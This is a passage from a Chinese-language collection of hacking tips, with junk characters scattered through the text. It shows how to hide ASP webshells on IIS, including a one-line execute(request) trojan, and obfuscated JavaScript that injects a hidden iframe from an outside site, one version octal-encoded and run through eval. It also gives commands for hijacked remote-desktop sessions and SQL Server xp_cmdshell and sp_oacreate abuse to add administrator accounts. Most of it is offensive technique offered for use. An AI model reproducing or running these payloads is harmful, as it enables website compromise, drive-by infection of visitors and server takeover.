, B O: K# c& ?% X1 b+ }- j
52、at "12:17" /interactive cmd, t# f, f6 `$ N: o# Y2 p
执行后可以用AT命令查看新加的任务
2 {% b) p' p" t" z- Q. M% |用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
. n& O$ h4 A1 M, b2 w7 k, n& a; E6 `1 K9 `9 @# j9 R
53、隐藏ASP后门的两种方法. M7 S% r5 d# z, t
1、建立非标准目录:mkdir images..\) k# N/ M/ r+ G% v4 a
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
# Z W$ F+ Y% g! {通过web访问ASP木马:http://ip/images../news.asp?action=login
' b! m& C& x$ c9 C如何删除非标准目录:rmdir images..\ /s; J5 U4 G4 D! x8 R8 D
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:, x; g* N( S+ v2 d
mkdir programme.asp2 y9 W& f" L k9 v, I$ O2 T0 w, c
新建1.txt文件内容:<!--#include file=”12.jpg”-->5 ^. h3 X6 w t# Q+ L
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
6 m4 i7 o) S2 r3 Mattrib +H +S programme.asp& D7 S. S0 l% P' ^8 m0 k
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
- P9 a- e( a: S
9 Y' H4 ]- b; m) t5 g6 e54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
1 g! e: H, f( ~- B% o然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。, }+ R) t4 Q( X
7 ~! T4 [( r: D( E55、JS隐蔽挂马
8 ~+ E5 m" v! `: D k1.
; G# Y8 i1 t( r( s7 ~var tr4c3="<iframe src=ht";
, {4 k Q9 y8 }: k8 E# Atr4c3 = tr4c3+"tp:/";; K4 Y4 k+ M9 p6 E. h1 w1 h. p3 e: N
tr4c3 = tr4c3+"/ww";
/ C8 }, p2 s; K7 O# g2 Ntr4c3 = tr4c3+"w.tr4";
; d8 y5 G9 `5 g* A2 gtr4c3 = tr4c3+"c3.com/inc/m";2 m' ~$ i% c, Y8 Z
tr4c3 = tr4c3+"m.htm style="display:none"></i";
. b4 O% L2 K3 K0 u R8 u& htr4c3 =tr4c3+"frame>'";2 o5 O& [7 D* A* @
document.write(tr4c3);
+ ^+ O& @: ]2 }! o7 z' }避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。1 |: S7 W1 |$ ^, C
! Z% K& a) m; u$ g
2.
, }- l) B) n2 b. j: f转换进制,然后用EVAL执行。如
, o7 E. y5 O% B- beval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");4 ~: _8 O$ G' V
不过这个有点显眼。( X0 ~7 \: B4 P6 w
3.
* S& }3 v* A% k; h& m; F! \& vdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
- C4 ]" O$ }+ n5 G最后一点,别忘了把文件的时间也修改下。, m: m- a0 L* w: A1 V
" D% F8 p) I D% i+ b56.3389终端入侵常用DOS命令0 ~" }) J+ ^3 w0 `
taskkill taskkill /PID 1248 /t# }2 u' k+ F9 _' V, ?3 \4 M: b2 {$ W
/ N, r, P) o- D& C" u
tasklist 查进程
2 h! G/ b# V2 g8 D: Q$ T1 W0 L8 E7 T" H4 K8 a8 D2 L8 L, J
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
# d( m5 Y( r4 @/ ]iisreset /reboot) d; F* V5 e% j; v
tsshutdn /reboot /delay:1 重起服务器
. b9 i* o( E3 ?( D: ~: ]
; i6 K( E/ p- _9 e) V1 x0 k1 ~logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
! t+ M% P4 R5 i# q( \0 a6 x# s0 h6 v% _: ] B; m" ?
query user 查看当前终端用户在线情况/ L, G2 X0 M/ q, e9 V$ W- @9 s) P
* v+ f9 k, n8 I
要显示有关所有会话使用的进程的信息,请键入:query process *
* D( \* b7 u/ s W8 v, a/ {0 L& p
6 r; y* @. [, y# V. s要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
5 M) E+ U, K5 E, O8 N+ M3 B4 X
2 e) V; C3 }1 k ]+ c8 b要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2/ {0 a. e: [' M( `% Q
7 ^$ A$ U! z* R" Z8 j" c要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02% i2 ^ G# w0 Q, }
2 p4 \4 p% p: w0 u
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启* D7 q! a D2 N0 y1 b
5 i. k$ @" w, a; X命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统8 T) I, A. G/ R8 i' D, ?
, ~" D+ z& F0 c7 I0 Q, P* t) i
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。* X. X8 k/ g0 x/ }
8 I! H' u% O- H命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机6 r6 ], U" L9 d- ^ q S0 l1 g8 S
% {& A; [- O: L, G" w6 G' ^5 Q
56、在地址栏或按Ctrl+O,输入:1 ?3 e2 K* }" Y6 F
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;6 E0 y- X! @: `5 c2 c
: {' H0 q' q4 D- y
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。/ q" c: Y" c/ J3 f/ e
, w$ f$ s* R4 F4 f* W57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
$ q& x/ G- ]- b8 C6 Y7 y6 Z; B" v用net localgroup administrators是可以看到管理组下,加了$的用户的。
$ @$ q! }5 H, P' G/ A1 J2 N+ g- a) }4 N% T. n5 I6 V
58、 sa弱口令相关命令
, U7 @! r, V: S
( w% T, z6 k, E I1 d* \) P: ^一.更改sa口令方法: B; M% U- }9 Z k% \# b/ p
用sql综合利用工具连接后,执行命令:
" B: R' @$ p1 U! J* D, ~0 F& i1 lexec sp_password NULL,'20001001','sa'
/ B/ X9 S5 H# t. {, J(提示:慎用!)
$ O& ^1 O' e0 _: Y+ V; y, e% r" e& A# {
二.简单修补sa弱口令.
# `% W! ]1 T' h. e& b7 y' E( c" N- n4 O
方法1:查询分离器连接后执行:
' x$ r( J7 P# u/ }. e3 [; h pif exists (select * from
# Z0 `+ e! G8 |' C6 d Z0 Idbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
, a/ h9 M' b" V- nOBJECTPROPERTY(id, N'IsExtendedProc') = 1)) K3 z' d; ]0 X! n/ j; {
3 l" M5 [) }; J7 F# r$ _% M4 [5 texec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
$ n% s* Y0 Q) ^. s1 N5 O
# z7 {5 W; e0 ~ x( ?( hGO0 m# ~/ M0 w2 V. I. Y
7 T5 `" J6 Y& E9 J V8 B% J R2 b
然后按F5键命令执行完毕) g: M( c, j0 y% ~& u; Z+ P
( p+ H: Q8 u2 T/ s" z3 \
方法2:查询分离器连接后3 h% c1 q- c! H+ J; Q+ ]) _" q
第一步执行:use master9 q* S4 \' O# o" m
第二步执行:sp_dropextendedproc 'xp_cmdshell'
7 x8 ~9 r' |- h" |2 |" ?9 L然后按F5键命令执行完毕0 l; o0 d1 U) \* E& ?: z+ b3 y
8 W# v0 t2 B# v( P
( z2 [+ a: J9 D' {# u# r* Q三.常见情况恢复执行xp_cmdshell.
8 l* R, C4 t, H1 W! |
! |- e/ K2 p' K# t$ U# ]. J3 n7 y n0 N7 m8 g6 E5 f7 q
1 未能找到存储过程'master..xpcmdshell'.
; p- a# s4 S! Y8 Q! u6 `8 O 恢复方法:查询分离器连接后,
4 j0 J, M+ E7 {' H o$ h5 a9 B第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
5 K$ G, d, v w7 o4 J' J7 S第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 t2 D: @8 f& c6 n3 \然后按F5键命令执行完毕
, P$ h+ K4 y: x% C* N& q! F z: c
# ?7 E9 ? [7 C. _$ N2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
6 N7 c2 q L6 f' a$ l恢复方法:查询分离器连接后,# F$ j* E4 e' z3 B8 S. H
第一步执行:sp_dropextendedproc "xp_cmdshell"& j* r% t' n; }! q6 D! m$ d, O
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 k) r) H/ L3 c9 J, a/ l然后按F5键命令执行完毕( F8 N- K6 L; q8 B: U {
% t# H( D" V2 l5 Y5 C3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
! c4 ~! e8 Z5 S' C3 F1 c恢复方法:查询分离器连接后,! {5 w" H' B! @" @/ ]! t# h
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'6 ~3 J1 y, n7 I' B/ d( D* }8 g: o
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' k+ g$ P4 Q7 n) a7 u& u
然后按F5键命令执行完毕5 Y% \4 M# m/ N8 {8 y3 M# X1 T8 W
, X- ]2 E' c# ?3 K0 U7 X8 z$ `" G四.终极方法.
( S6 J5 _" Y7 L# d( g j如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:8 C; c O4 z( s0 c
查询分离器连接后, r' }& T6 G2 W$ ]3 D# Q$ o
2000servser系统:8 }& \1 p( e9 W& f) m/ a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'* P4 r# A/ l7 O
( B, m" b) k: W* G5 P }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 R# q, ?, E1 T+ {
x1 K' o% v# mxp或2003server系统:- X; o0 H& [0 e# ?& g7 c* ]' `
( j+ p3 e& m) ^2 o9 \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'% l v! f7 y) ?1 g, L" t: I
, U/ P8 B# }' G7 w8 `+ _% @
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 y# z3 K1 }" }; j- @' |# } |